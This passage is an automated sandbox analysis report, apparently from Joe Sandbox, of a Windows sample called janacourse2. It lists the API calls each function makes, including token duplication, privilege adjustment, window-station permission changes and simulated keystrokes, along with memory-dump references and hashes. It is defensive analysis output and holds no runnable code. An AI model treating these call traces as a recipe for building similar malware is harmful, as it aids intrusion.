                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB2B6B
                                                                                                              • Part of subcall function 00FB30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FB314E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                            • String ID:
                                                                                                            • API String ID: 3667716007-0
                                                                                                            • Opcode ID: 5de3232277e46e6c74508d2ca2732f10fa512fbd53f74e5c7c77b0c69aeac574
                                                                                                            • Instruction ID: d32cf88fef08981a17ddede301699b7559cb8a7e1d88786637acd3e812c59d70
                                                                                                            • Opcode Fuzzy Hash: 5de3232277e46e6c74508d2ca2732f10fa512fbd53f74e5c7c77b0c69aeac574
                                                                                                            • Instruction Fuzzy Hash: 26E0263270820407CA04BA769C524EDB3599FD5351F40153EF1C243153CE3D86465B12
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00FF0704,?,?,00000000,?,00FF0704,00000000,0000000C), ref: 00FF03B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: e5a7739800f3358c31eab8966c3c27af218d3e20f3266ec135ed848f63bf5c0f
                                                                                                            • Instruction ID: be86c52b115530e6335bf60115650b5bac3866bc8edfe67ccb29003750b09e4d
                                                                                                            • Opcode Fuzzy Hash: e5a7739800f3358c31eab8966c3c27af218d3e20f3266ec135ed848f63bf5c0f
                                                                                                            • Instruction Fuzzy Hash: CDD06C3204010DBBDF128E84DE46EDA3BAAFB48714F014000BE5856020C736E821AB90
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00FB1CBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoParametersSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098949447-0
                                                                                                            • Opcode ID: 793c338a1396127c276ee940f99be6d58a528001c9b7890417b9dda3d2bd9aa3
                                                                                                            • Instruction ID: e3aa617f0a668cb88f703380e477c1dc95acb5cd09c013c59e36674bb0f8bdf7
                                                                                                            • Opcode Fuzzy Hash: 793c338a1396127c276ee940f99be6d58a528001c9b7890417b9dda3d2bd9aa3
                                                                                                            • Instruction Fuzzy Hash: 3AC04C352842049FF2244680B94AF587755A748B00F048001F6C9555C782B71450D750
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FB949C,?,00008000), ref: 00FB5773
                                                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 010276DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1214770103-0
                                                                                                            • Opcode ID: 83e12a5880d0c14c425199aaaee7a64bee2693442a44a0bf96343974691288f2
                                                                                                            • Instruction ID: 02a22e25750ba6762c3be4904441fa318f474ad262f77de7ff86f5f3d2cdd3cd
                                                                                                            • Opcode Fuzzy Hash: 83e12a5880d0c14c425199aaaee7a64bee2693442a44a0bf96343974691288f2
                                                                                                            • Instruction Fuzzy Hash: 1B81AF302043118FDB25EF29C891BAAB7E1BF98310F08455DF9865B292DB78E945DF92
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?,?,00000000,00FF24E0), ref: 00FB6266
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 52fd0cbd88fcebc596511dbbc47ec308e11a77b15345d1a35ef4efd006131e74
                                                                                                            • Instruction ID: a0bbada061c3d9dad58385cbf26bcdbd80f5e16c6ae84905b5a4fd3458e5cb8a
                                                                                                            • Opcode Fuzzy Hash: 52fd0cbd88fcebc596511dbbc47ec308e11a77b15345d1a35ef4efd006131e74
                                                                                                            • Instruction Fuzzy Hash: 54E09275900B01DFE7354F1AE904452FBE5FEE13613204A2ED4E592660D3B458869F50
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 014DAC99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction ID: c5ece3333d424a6e7fca30a9feccbfbba3294b135e94d11a861cb9e01cdde7d1
                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction Fuzzy Hash: D2E0E67494410DDFDB00DFB4D6496AD7BB4EF04701F100161FD01D2280D6319D508A62
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0104961A
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104965B
                                                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0104969F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010496C9
                                                                                                            • SendMessageW.USER32 ref: 010496F2
                                                                                                            • GetKeyState.USER32(00000011), ref: 0104978B
                                                                                                            • GetKeyState.USER32(00000009), ref: 01049798
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 010497AE
                                                                                                            • GetKeyState.USER32(00000010), ref: 010497B8
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010497E9
                                                                                                            • SendMessageW.USER32 ref: 01049810
                                                                                                            • SendMessageW.USER32(?,00001030,?,01047E95), ref: 01049918
                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0104992E
                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 01049941
                                                                                                            • SetCapture.USER32(?), ref: 0104994A
                                                                                                            • ClientToScreen.USER32(?,?), ref: 010499AF
                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 010499BC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010499D6
                                                                                                            • ReleaseCapture.USER32 ref: 010499E1
                                                                                                            • GetCursorPos.USER32(?), ref: 01049A19
                                                                                                            • ScreenToClient.USER32(?,?), ref: 01049A26
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01049A80
                                                                                                            • SendMessageW.USER32 ref: 01049AAE
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01049AEB
                                                                                                            • SendMessageW.USER32 ref: 01049B1A
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 01049B3B
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 01049B4A
                                                                                                            • GetCursorPos.USER32(?), ref: 01049B68
                                                                                                            • ScreenToClient.USER32(?,?), ref: 01049B75
                                                                                                            • GetParent.USER32(?), ref: 01049B93
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01049BFA
                                                                                                            • SendMessageW.USER32 ref: 01049C2B
                                                                                                            • ClientToScreen.USER32(?,?), ref: 01049C84
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01049CB4
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01049CDE
                                                                                                            • SendMessageW.USER32 ref: 01049D01
                                                                                                            • ClientToScreen.USER32(?,?), ref: 01049D4E
                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 01049D82
                                                                                                              • Part of subcall function 00FC9944: GetWindowLongW.USER32(?,000000EB), ref: 00FC9952
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01049E05
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                            • API String ID: 3429851547-4164748364
                                                                                                            • Opcode ID: 4ab1b4107d27025f14378ed74766237ff186e1dd418e11c8b073439af98d43f1
                                                                                                            • Instruction ID: 52462a60ca60c2129865e3eb71b27db0d11e55dc59113314d1df29dd816dd05c
                                                                                                            • Opcode Fuzzy Hash: 4ab1b4107d27025f14378ed74766237ff186e1dd418e11c8b073439af98d43f1
                                                                                                            • Instruction Fuzzy Hash: F0428BB4208201AFE725CF28C985EABBBE5FF4C318F004669F6D9872A1D735A851CF51
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 010448F3
                                                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 01044908
                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 01044927
                                                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0104494B
                                                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0104495C
                                                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0104497B
                                                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 010449AE
                                                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 010449D4
                                                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 01044A0F
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01044A56
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01044A7E
                                                                                                            • IsMenu.USER32(?), ref: 01044A97
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01044AF2
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01044B20
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01044B94
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 01044BE3
                                                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 01044C82
                                                                                                            • wsprintfW.USER32 ref: 01044CAE
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01044CC9
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01044CF1
                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01044D13
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01044D33
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01044D5A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                            • String ID: %d/%02d/%02d
                                                                                                            • API String ID: 4054740463-328681919
                                                                                                            • Opcode ID: f23cdf5cc12c5855250d4fea38c76fb2ea549af8169672e0f55ef101135f8459
                                                                                                            • Instruction ID: 389448c5fe15bfeea23462ebce3e58827f5089a862b873f5b7526c5786c16c0e
                                                                                                            • Opcode Fuzzy Hash: f23cdf5cc12c5855250d4fea38c76fb2ea549af8169672e0f55ef101135f8459
                                                                                                            • Instruction Fuzzy Hash: 4812F2B1600214ABFB259F28CD89FAE7BF8EF45310F044169F996DB2D1DB789941CB50
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00FCF998
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0100F474
                                                                                                            • IsIconic.USER32(00000000), ref: 0100F47D
                                                                                                            • ShowWindow.USER32(00000000,00000009), ref: 0100F48A
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0100F494
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100F4AA
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0100F4B1
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100F4BD
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0100F4CE
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0100F4D6
                                                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0100F4DE
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0100F4E1
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F4F6
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0100F501
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F50B
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0100F510
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F519
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0100F51E
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100F528
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0100F52D
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0100F530
                                                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0100F557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                            • Opcode ID: bfea92310dff228cfbca8442b924b244774dd4c1e50b94e43c89620948200999
                                                                                                            • Instruction ID: 400e3ff5b6c68aab3f786f50adaded5487d2308a038c80fb5d30bec5104101ae
                                                                                                            • Opcode Fuzzy Hash: bfea92310dff228cfbca8442b924b244774dd4c1e50b94e43c89620948200999
                                                                                                            • Instruction Fuzzy Hash: 343194B5A41218BBFB316BB54E8AFBF7E6CEB44B50F100055FB40E61C1C7B65940ABA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 010116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101170D
                                                                                                              • Part of subcall function 010116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101173A
                                                                                                              • Part of subcall function 010116C3: GetLastError.KERNEL32 ref: 0101174A
                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01011286
                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 010112A8
                                                                                                            • CloseHandle.KERNEL32(?), ref: 010112B9
                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010112D1
                                                                                                            • GetProcessWindowStation.USER32 ref: 010112EA
                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 010112F4
                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01011310
                                                                                                              • Part of subcall function 010110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010111FC), ref: 010110D4
                                                                                                              • Part of subcall function 010110BF: CloseHandle.KERNEL32(?,?,010111FC), ref: 010110E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                            • String ID: $default$winsta0
                                                                                                            • API String ID: 22674027-1027155976
                                                                                                            • Opcode ID: 581d8a8243ffe807c8eb6d25109bca3cff4b4b9af4f83be4eed1ccb8d07d398a
                                                                                                            • Instruction ID: 9be07ae51160f52ffe56f472c6f2b3a6c7347c44f31f897d78a40952f25d318a
                                                                                                            • Opcode Fuzzy Hash: 581d8a8243ffe807c8eb6d25109bca3cff4b4b9af4f83be4eed1ccb8d07d398a
                                                                                                            • Instruction Fuzzy Hash: 4781B1B1900209AFEF259FA8DD49FEE7FB9EF08700F044069FB90A6154CB399944CB61
                                                                                                            APIs
                                                                                                              • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011114
                                                                                                              • Part of subcall function 010110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011120
                                                                                                              • Part of subcall function 010110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 0101112F
                                                                                                              • Part of subcall function 010110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011136
                                                                                                              • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101114D
                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01010BCC
                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01010C00
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 01010C17
                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 01010C51
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01010C6D
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 01010C84
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01010C8C
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 01010C93
                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01010CB4
                                                                                                            • CopySid.ADVAPI32(00000000), ref: 01010CBB
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01010CEA
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01010D0C
                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01010D1E
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010D45
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010D4C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010D55
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010D5C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010D65
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010D6C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 01010D78
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010D7F
                                                                                                              • Part of subcall function 01011193: GetProcessHeap.KERNEL32(00000008,01010BB1,?,00000000,?,01010BB1,?), ref: 010111A1
                                                                                                              • Part of subcall function 01011193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01010BB1,?), ref: 010111A8
                                                                                                              • Part of subcall function 01011193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01010BB1,?), ref: 010111B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 4175595110-0
                                                                                                            • Opcode ID: f47b0c6f280f7378acd8333d6dc857d3796eadc9d85797ca065db7080dd0acb7
                                                                                                            • Instruction ID: b672d2b158bc3b2308c7eb4b17303fe093551d7a7a39254fb6fe9d151e69f773
                                                                                                            • Opcode Fuzzy Hash: f47b0c6f280f7378acd8333d6dc857d3796eadc9d85797ca065db7080dd0acb7
                                                                                                            • Instruction Fuzzy Hash: D1718EB590120AABEF20DFA4DD84BEEBBB8BF05300F044155FA94A6188D779A945CB60
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32(0104CC08), ref: 0102EB29
